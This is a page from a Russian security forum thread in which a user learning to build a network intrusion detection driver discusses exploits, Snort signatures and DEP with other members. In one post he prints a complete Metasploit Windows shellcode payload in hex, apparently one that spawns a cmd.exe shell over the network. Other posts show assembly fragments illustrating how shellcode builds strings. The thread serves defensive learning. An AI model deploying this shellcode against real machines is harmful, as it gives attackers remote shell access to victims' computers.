Страница 1 из 2 12 Последняя
Показано с 1 по 20 из 32.

Как борятся с эксплоитами?

  1. #1
    Junior Member Репутация
    Регистрация
    19.08.2009
    Сообщений
    22
    Вес репутации
    31

    Как борятся с эксплоитами?

    Всем добрый день! Я скачал исходники антиэксплоита для Linux, для Windows такого я не нашел. Идея борьбы заключается в том что существует база данных MD5 хешей с которыми сравниваются пакеты. Мне хочется самому написать что-нибудь подобное, подскажите пожалуйста механизмы борьбы с експлоитами. Спасибо

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для AndreyKa
    Регистрация
    08.01.2005
    Адрес
    Россия
    Сообщений
    13,625
    Вес репутации
    1291
    Правильный путь борьбы с эксплойтами - установка патчей (обновлений безопасности).

  4. #3
    Junior Member Репутация
    Регистрация
    19.08.2009
    Сообщений
    22
    Вес репутации
    31
    AndreyKa, спасибо. Я хочу знать какие алгоритмы применяются для борьбы с эксплоитами.

  5. #4
    Junior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    04.09.2007
    Сообщений
    584
    Вес репутации
    634
    eboev, никакие, ибо "эксплоит" это программный код - демонстрирующий использование какой либо уязвимости в чем либо.
    так что борются с уязвимостями . а не с примерами их эксплуатации.

    ЗЫ если вам в голову забивают гвоздь, то глупо бороться с молотком, надежней каску одеть, и руки забивальщику оторвать . шутка-юмора, но аналогия верна.

  6. #5
    Junior Member Репутация
    Регистрация
    19.08.2009
    Сообщений
    22
    Вес репутации
    31
    Цитата Сообщение от Virtual Посмотреть сообщение
    eboev, никакие, ибо "эксплоит" это программный код - демонстрирующий использование какой либо уязвимости в чем либо.
    так что борются с уязвимостями . а не с примерами их эксплуатации.

    ЗЫ если вам в голову забивают гвоздь, то глупо бороться с молотком, надежней каску одеть, и руки забивальщику оторвать . шутка-юмора, но аналогия верна.
    логично, но на форуме wasm встречаю такую запись: "Вообще я просто однажды придумал метод как бороться с эксплоитам на переполнения так чтобы при этом не только не передавалось управление на враждебный код, но и программа не падала. И начал делать просто как маленькую исследовательскую работу. Потом еще в проект добавились средства для войны с эксплоитами уязвимостей форматной строки." Автор Dunkan, достучаться до него не получилось! Еще информация - Касперский имеет правила на отброс (необработку) некоторых пакетов, например NetSky, что это за пакеты я пока не разбирался, но сам метод мне кажется логичным для борьбы. Еще есть антиэксплоит AntiExploit для Linux - его суть: хранить базу данных MD5 хешей експлоитов и при получении таких файлов - просто отбрасывать их, но у этого метода есть недостатки: надо обновлять базы, которые обновляются с задержкой, база увеличивается, время сравнения растет. Вот пока что я имею! Наш форум советуют на других - люди говорят что здесь все есть про эксплоиты, но я пока не нашел может мне в другой раздел написать?

  7. #6
    Junior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    04.09.2007
    Сообщений
    584
    Вес репутации
    634
    eboev,
    для начала изучить терминологию
    http://virusinfo.info/showthread.php?t=1498
    .далее, решить с какими конкретно типами опасностей хочеш боротся? //т.к. для каждого типа существуют свои и только свои методы.
    .....
    так что.? чего-ж конкретно то хочеш?

  8. #7
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    28.03.2006
    Сообщений
    2,780
    Вес репутации
    1363
    Эксплоит под windows и под linux две большие разницы. В основном эксплоиты "идут" не под конкретно операционную систему (хотя например кидо эксплуатировал уъязвимость именно Windows), а под приложения (Акробат ридер, флэш плейр, Офис, java). Поэтому собирать md5 сплоитов бессысленно - можно сделать миллион pdf файлов эксплуатирующих одну и тоже уъязвимость, но имющие разную md5 чек-сумму.

  9. #8
    Expert Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для DVi
    Регистрация
    28.08.2006
    Адрес
    moscow
    Сообщений
    3,698
    Вес репутации
    2151
    Alex_Goodwin, как я понял по сумбурному описанию, eboev говорил о системе IDS.
    В любом случае ему следует для начала воспользоваться советом Virtual и научиться корректно излагать свою мысль.

  10. #9
    Junior Member Репутация
    Регистрация
    19.08.2009
    Сообщений
    22
    Вес репутации
    31
    По ссылке прошел и прочитал, спасибо извините что не конкретно поставил задачу
    теперь к делу - експлоит это программный код который использует дыру: обычно он использует 3 самые распространенные уязвимости: стека, форматной строки и кучи. в результате происходит перезапись регистра, например регистра возврата и управление передается на shell код, который еще называют полезной нагрузкой. дальше - больше, это shell код например начинает загружать на машину жертвы троян. Я это описал для лучшего взаимопонимания, а теперь у меня есть NDIS и TDI драйвера и через мой драйвер проходит весь траффик. Я хочу предотвратить аттаку, спасибо Alex_Goodwin за напоминание термина IDS, это я и хочу сделать! И хочу попросить вас поделиться опытом.
    У меня есть информация что есть сигнатуры на пакеты, например если пакет содержит только флаги SYN и FIN то это аттака и мой NDIS драйвер отбросит этот пакет Мне кажется моя задача собрать базу из таких эвристик. Что скажите?

  11. #10
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    28.03.2006
    Сообщений
    2,780
    Вес репутации
    1363
    Посмотрите тут http://www.snortgroup.ru/

  12. #11
    Junior Member Репутация
    Регистрация
    19.08.2009
    Сообщений
    22
    Вес репутации
    31
    Цитата Сообщение от Alex_Goodwin Посмотреть сообщение
    Посмотрите тут http://www.snortgroup.ru/
    Респект Alex_Goodwin

  13. #12
    Junior Member Репутация
    Регистрация
    19.08.2009
    Сообщений
    22
    Вес репутации
    31
    Snort - отличная штука, спасибо вам буду использовать его идеи. Я не нашел подобного, имеются какие - нибудь еще проекты IDS с открытыми исходниками?

  14. #13
    Expert Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для DVi
    Регистрация
    28.08.2006
    Адрес
    moscow
    Сообщений
    3,698
    Вес репутации
    2151
    Цитата Сообщение от eboev Посмотреть сообщение
    если пакет содержит только флаги SYN и FIN то это аттака и мой NDIS драйвер отбросит этот пакет
    Самая простая реализация пакетного фильтра сетевых атак описана вот в этом RFC: http://www.networksorcery.com/enp/rfc/rfc3514.txt
    Не знаю, почему его никто не читает...

  15. #14
    Junior Member Репутация
    Регистрация
    19.08.2009
    Сообщений
    22
    Вес репутации
    31
    Поставил виртуальную машину, на нее залил заведомо дырявый Windows. Запустил на виртуальной машине Wireshark, чтобы анализировать входящие пакеты. На родной машине поставил Metasploit Framework 3 и пробил виртуалку, в целях безопасности не буду говорить каким эксплоитом и shell-кодом. Далее я проанализировал shell скрипт, он содержит байт код:
    'Payload' =>
    "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\ x8B\x52\x30\x8B" +
    "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\ x31\xFF\x31\xC0" +
    "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\ xE2\xF0\x52\x57" +
    "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\ xC0\x74\x4A\x01" +
    "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\ x49\x8B\x34\x8B" +
    "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\ x38\xE0\x75\xF4" +
    "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\ x01\xD3\x66\x8B" +
    "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\ x89\x44\x24\x24" +
    "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\ x12\xEB\x86\x5D" +
    "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\ x4C\x77\x26\x07" +
    "\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\ x29\x80\x6B\x00" +
    "\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\ x0F\xDF\xE0\xFF" +
    "\xD5\x89\xC7\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\ xE6\x6A\x10\x56" +
    "\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\ xE9\x38\xFF\xFF" +
    "\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\ x89\xC7\x68\x75" +
    "\x6E\x4D\x61\xFF\xD5\x68\x63\x6D\x64\x00\x89\xE3\ x57\x57\x57\x31" +
    "\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\ x01\x01\x8D\x44" +
    "\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\ x4E\x56\x56\x53" +
    "\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0\x4E\x56\ x46\xFF\x30\x68" +
    "\x08\x87\x1D\x60\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x68\ xA6\x95\xBD\x9D" +
    "\xFF\xD5\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\ x47\x13\x72\x6F" +
    "\x6A\x00\x53\xFF\xD5".

    В этом байт-коде есть последовательность \x63\x6D\x64 = cmd, shell код поднимает cmd на машине жертвы. Но вот что странно: я анализировал все входящие пакеты на машине жертвы с помощью Wireshark и не встретил там последовательности cmd, как shell коду удалось запустить cmd.exe?

  16. #15
    Junior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    04.09.2007
    Сообщений
    584
    Вес репутации
    634
    eboev, рано вам начинать заниматся вирусописательством

    по вопросу... а в пакетах и не должно в явном виде быть искомого., ибо уязвимость может быть напр за транслятором из юникода в ... //это простейший пример. (создай 2 файла в юникоде и в анси, открой хекс редактором и почувствуй разницу)

  17. #16
    Junior Member Репутация
    Регистрация
    19.08.2009
    Сообщений
    22
    Вес репутации
    31
    >>eboev, рано вам начинать заниматся вирусописательством
    я хотел сделать сигнатуру на проверку строки "cmd" в пакетах, чтобы парсить пакеты и обнаруживать таким образом шелл-коды.

    >>(создай 2 файла в юникоде и в анси, открой хекс редактором и почувствуй >>разницу)
    все проделал, там в юникоде 2 байта, последовательность будет c.m.d. такой последовательности в пакетах тоже нет. есть предположение что шелл код шифруется.

  18. #17
    Junior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    04.09.2007
    Сообщений
    584
    Вес репутации
    634
    eboev, возможно но врятли ибо и так хлопот хватает.
    в общем и частном случае, забудь про сигнатурный поиск цмд . это точно.
    т.к.
    1. обычно шелкод это исполняемый код а не данные!!! соответственно //упрощенный пример, это может быть
    Код:
    push 'C'
    push 'M'
    push 'D'
    push '.'
    push 'E'
    push 'X'
    push 'E'
    call xxxx
    .
    а может и так
    Код:
    push 'M'
    push 'C'
    push '.'
    push 'D'
    push 'X'
    push 'E'
    push 00h
    push 'E'
    call xxxx


    в более сложных вариантах, накладываются ограничения. типа таких как не должно быть 00H в коде /это самое часто встречаемое/
    (вот сам попробуй на асме такой код написать, поверь возможно, но хлопотно)
    соответственно код исковеркан до неузнаваемости, и это не чтоб ты непонял, а только все ради того, дабы протащить его через лабиринт дыр в системе.

  19. #18
    Junior Member Репутация
    Регистрация
    19.08.2009
    Сообщений
    22
    Вес репутации
    31
    понял, спасибо! Snort использует сигнатуры но не тривиальные, например правило, которе задетектило атаку содержит
    content:"|05 00 00|".

  20. #19
    Junior Member Репутация
    Регистрация
    19.08.2009
    Сообщений
    22
    Вес репутации
    31
    >>в общем и частном случае, забудь про сигнатурный поиск цмд . >>это точно.
    Я теперь подумываю над возможностью мониторить изменение регистра eip.

  21. #20
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    11.12.2006
    Сообщений
    3,698
    Вес репутации
    1814
    eboev, DEP этим занимается)))
    The worst foe lies within the self...

Страница 1 из 2 12 Последняя

Похожие темы

  1. В сети открылась площадка для торговли эксплоитами
    От HATTIFNATTOR в разделе Новости компьютерной безопасности
    Ответов: 1
    Последнее сообщение: 07.07.2007, 10:57

Метки для этой темы

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.00767 seconds with 16 queries